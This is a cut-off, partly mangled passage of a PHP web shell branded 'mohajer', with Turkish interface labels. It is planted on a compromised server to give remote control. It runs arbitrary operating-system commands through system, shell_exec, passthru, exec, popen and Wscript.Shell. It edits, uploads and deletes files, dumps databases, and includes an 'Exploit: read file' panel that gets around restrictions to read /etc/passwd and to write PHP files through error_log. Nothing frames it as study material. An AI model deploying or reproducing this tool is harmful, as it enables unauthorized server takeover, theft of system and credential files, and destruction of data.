"; exit; } if (empty($_POST['erne'] ) ) { }ELSE{ $action = '?action=erne'; echo "
"; echo " |
"; exit; } if (empty($_POST['command'] ) ) { }ELSE{ if (substr(PHP_OS, 0, 3) == 'WIN') { $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe"; $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt"; echo "\n"; } $tb = new FORMS; $tb->tableheader(); $tb->tdbody('
'.$_SERVER['HTTP_HOST'].' | '.$mohajer.' | '.$_SERVER['REMOTE_ADDR'].' |
','center','top'); $tb->tdbody("
"); $tb->tablefooter(); $tb->tableheader(); $tb->tdbody('
command [ system , shell_exec , passthru , Wscript.Shell , exec , popen ] |
','center','top'); $tb->tdbody('
'); $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen'); $tb->headerform(array('content'=>'cmd:'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit'))); echo" |
"; exit; }//end shell if ($_POST['editfile']){ $fp = fopen($_POST['editfile'], "r"); $filearr = file($_POST['editfile']); foreach ($filearr as $string){ $content = $content . $string; } echo "
"; fclose($fp); } if($_POST['savefile']){ $fp = fopen($_POST['savefile'], "w"); $content = stripslashes($content); fwrite($fp, $content); fclose($fp); echo "
"; } if ($doupfile) { echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "?????«????¦!" : "?????«???§?°?¬!"; } elseif (($createdirectory) AND !empty($_POST['newdirectory'])) { if (!empty($newdirectory)) { $mkdirs="$dir/$newdirectory"; if (file_exists("$mkdirs")) { echo "can't make dir"; } else { echo (@mkdir("$mkdirs",0777)) ? "ok" : ""; @chmod("$mkdirs",0777); } } } ///////// $pathname=str_replace('\\','/',dirname(__FILE__)); //////// if (!isset($dir) or empty($dir)) { $dir = "."; $nowpath = getPath($pathname, $dir); } else { $dir=$_post['dir']; $nowpath = getPath($pathname, $dir); } /////// $dir_writeable = (dir_writeable($nowpath)) ? "m" : "mm"; $phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO()" : ""; $reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | " : ""; $tb = new FORMS; $tb->tableheader(); $tb->tdbody('
'.$_SERVER['HTTP_HOST'].' | '.$mohajer.' | '.$_SERVER['REMOTE_ADDR'].' |
','center','top'); $tb->tdbody("
"); $tb->tablefooter(); $tb->tableheader(); $tb->tdbody('
Dosya Duzenle Yada Olustur & Dosya Yukle & Dizin Olustur |
','center','top'); $tb->tdbody('
'); $tb->headerform(array('content'=>'Dosya Duzenle weya Olustur:'.$tb->makehidden('dir', getcwd() ).' '.$tb->makeinput('editfile').' '.$tb->makeinput('Edit','Duzenle','','submit'))); $tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'Dosya Yukle:'.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','Ekle','','submit').$tb->makeinput('uploaddir',$dir,'','hidden'))); $tb->headerform(array('content'=>'Dizin Olustur: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','yenidizin','','submit'))); $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen'); $tb->headerform(array('content'=>'cmd:'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit'))); $tb->tdbody (" |
"); if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { $tb->tableheader(); echo"
"; $dirs=@opendir($dir); $dir_i = '0'; while ($file=@readdir($dirs)) { $filepath="$dir/$file"; $a=@is_dir($filepath); if($a=="1"){ if($file!=".." && $file!=".") { $ctime=@date("Y-m-d H:i:s",@filectime($filepath)); $mtime=@date("Y-m-d H:i:s",@filemtime($filepath)); $dirperm=substr(base_convert(fileperms($filepath),10,8),-4); echo "
\n"; $dir_i++; } else { if($file=="..") { echo "
\n"; } } } }// while @closedir($dirs); echo"
\n"; echo "\n"; }// end dir function debuginfo() { global $starttime; $mtime = explode(' ', microtime()); $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6); echo "Processed in $totaltime second(s)"; } function stripslashes_array(&$array) { while(list($key,$var) = each($array)) { if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) { if (is_string($var)) { $array[$key] = stripslashes($var); } if (is_array($var)) { $array[$key] = stripslashes_array($var); } } } return $array; } function deltree($deldir) { $mydir=@dir($deldir); while($file=$mydir->read()) { if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { @chmod("$deldir/$file",0777); deltree("$deldir/$file"); } if (is_file("$deldir/$file")) { @chmod("$deldir/$file",0777); @unlink("$deldir/$file"); } } $mydir->close(); @chmod("$deldir",0777); return (@rmdir($deldir)) ? 1 : 0; } function dir_writeable($dir) { if (!is_dir($dir)) { @mkdir($dir, 0777); } if(is_dir($dir)) { if ($fp = @fopen("$dir/test.txt", 'w')) { @fclose($fp); @unlink("$dir/test.txt"); $writeable = 1; } else { $writeable = 0; } } return $writeable; } function getrowbg() { global $bgcounter; if ($bgcounter++%2==0) { return "firstalt"; } else { return "secondalt"; } } function getPath($mainpath, $relativepath) { global $dir; $mainpath_info = explode('/', $mainpath); $relativepath_info = explode('/', $relativepath); $relativepath_info_count = count($relativepath_info); for ($i=0; $i<$relativepath_info_count; $i++) { if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue; if ($relativepath_info[$i] == '..') { $mainpath_info_count = count($mainpath_info); unset($mainpath_info[$mainpath_info_count-1]); continue; } $mainpath_info[count($mainpath_info)] = $relativepath_info[$i]; } return implode('/', $mainpath_info); } function getphpcfg($varname) { switch($result = get_cfg_var($varname)) { case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break; } } function getfun($funName) { return (false !== function_exists($funName)) ? "Yes" : "No"; } class PHPZip{ var $out=''; function PHPZip($dir) { if (@function_exists('gzcompress')) { $curdir = getcwd(); if (is_array($dir)) $filelist = $dir; else{ $filelist=$this -> GetFileList($dir);//????????? ?±?? foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1); } if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir); else chdir($curdir); if (count($filelist)>0){ foreach($filelist as $filename){ if (is_file($filename)){ $fd = fopen ($filename, "r"); $content = @fread ($fd, filesize ($filename)); fclose ($fd); if (is_array($dir)) $filename = basename($filename); $this -> addFile($content, $filename); } } $this->out = $this -> file(); chdir($curdir); } return 1; } else return 0; } function GetFileList($dir){ static $a; if (is_dir($dir)) { if ($dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { if($file!='.' && $file!='..'){ $f=$dir .'/'. $file; if(is_dir($f)) $this->GetFileList($f); $a[]=$f; } } closedir($dh); } } return $a; } var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } // end if return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode('', $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .= "\x00\x00"; $cdrec .= "\x14\x00"; $cdrec .= "\x00\x00"; $cdrec .= "\x08\x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; } } function sqldumptable($table, $fp=0) { $tabledump = "DROP TABLE IF EXISTS $table;\n"; $tabledump .= "CREATE TABLE $table (\n"; $firstfield=1; $fields = mysql_query("SHOW FIELDS FROM $table"); while ($field = mysql_fetch_array($fields)) { if (!$firstfield) { $tabledump .= ",\n"; } else { $firstfield=0; } $tabledump .= " $field[Field] $field[Type]"; if (!empty($field["Default"])) { $tabledump .= " DEFAULT '$field[Default]'"; } if ($field['Null'] != "YES") { $tabledump .= " NOT NULL"; } if ($field['Extra'] != "") { $tabledump .= " $field[Extra]"; } } mysql_free_result($fields); $keys = mysql_query("SHOW KEYS FROM $table"); while ($key = mysql_fetch_array($keys)) { $kname=$key['Key_name']; if ($kname != "PRIMARY" and $key['Non_unique'] == 0) { $kname="UNIQUE|$kname"; } if(!is_array($index[$kname])) { $index[$kname] = array(); } $index[$kname][] = $key['Column_name']; } mysql_free_result($keys); while(list($kname, $columns) = @each($index)) { $tabledump .= ",\n"; $colnames=implode($columns,","); if ($kname == "PRIMARY") { $tabledump .= " PRIMARY KEY ($colnames)"; } else { if (substr($kname,0,6) == "UNIQUE") { $kname=substr($kname,7); } $tabledump .= " KEY $kname ($colnames)"; } } $tabledump .= "\n);\n\n"; if ($fp) { fwrite($fp,$tabledump); } else { echo $tabledump; } $rows = mysql_query("SELECT * FROM $table"); $numfields = mysql_num_fields($rows); while ($row = mysql_fetch_array($rows)) { $tabledump = "INSERT INTO $table VALUES("; $fieldcounter=-1; $firstfield=1; while (++$fieldcounter<$numfields) { if (!$firstfield) { $tabledump.=", "; } else { $firstfield=0; } if (!isset($row[$fieldcounter])) { $tabledump .= "NULL"; } else { $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'"; } } $tabledump .= ");\n"; if ($fp) { fwrite($fp,$tabledump); } else { echo $tabledump; } } mysql_free_result($rows); } class FORMS { function tableheader() { echo "
".$title." [?·mohajer] | \n"; echo "
".$content." | \n"; echo "
\n"; } function formheader($action='',$title,$target='') { global $dir; $target = empty($target) ? "" : " target=\"".$target."\""; echo "
\n"; echo $end = empty($over) ? "" : "\n"; } function makeselect($arg = array()){ if ($arg[multiple]==1) { $multiple = " multiple"; if ($arg[size]>0) { $size = "size=$arg[size]"; } } if ($arg[css]==0) { $css = "class=\"input\""; } $select = "\n"; return $select; } } $tb->tableheader(); $tb->tdbody('
Exploit: read file [SQL , id , CURL , copy , ini_restore , imap] & Make file ERORR |
','center','top'); $tb->tdbody('
');
$tb->headerform(array('content'=>'read file : ' .$tb->makeinput('Mohajer22','/etc/passwd' ).$tb->makeinput('',Show,'Mohajer22','submit'))); $tb->headerform(array('content'=>'read file id: ' .$tb->makeid('plugin','cat /etc/passwd' ).$tb->makeinput('',Show,'plugin','submit'))); $tb->headerform(array('content'=>'read file CURL: ' .$tb->makeinput('curl','/etc/passwd' ).$tb->makeinput('',Show,'curl','submit'))); $tb->headerform(array('content'=>'read file copy: ' .$tb->makeinput('copy','/etc/passwd' ).$tb->makeinput('',Show,'copy','submit'))); $tb->headerform(array('content'=>'read file ini_restore: ' .$tb->makeinput('M2','/etc/passwd' ).$tb->makeinput('',Show,'M2','submit'))); $tb->headerform(array('content'=>'read file or dir with imap: ' .$tb->makeimp('switch','/etc/passwd' ).$tb->makeinput('string','/etc/passwd' ).$tb->makeinput('string','Show','','submit'))); $tb->headerform(array('content'=>'Make file ERORR: ' .$tb->makeinput('ER','Mohajer22.php' ).$tb->makeinput('ER','Write','ER','submit'))); // read file SQL ( ) // if(empty($_POST['Mohajer22'])){ } else { echo "read file SQL"," " ; echo ""; } // ERORR // if(empty($_POST['ER'])){ } else { $ERORR=$_POST['ER']; echo error_log(" "; echo ""; break; } // CURL // if(empty($_POST['curl'])){ } else { echo "read file CURL"," " ; echo ""; } // copy// $u1p=""; $tymczas=""; if(empty($_POST['copy'])){ } else { echo "read file copy" ," "; echo ""; } else { die(" "; echo ""; } // imap // $string = !empty($_POST['string']) ? $_POST['string'] : 0; $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0; if ($string && $switch == "file") { echo "read file imap" ," "; echo ""; } elseif ($string && $switch == "dir") { echo "read dir imap"," " ; echo ""; } $tb->tdbody (""); // open dir // $tb->tableheader(); $tb->tdbody('
|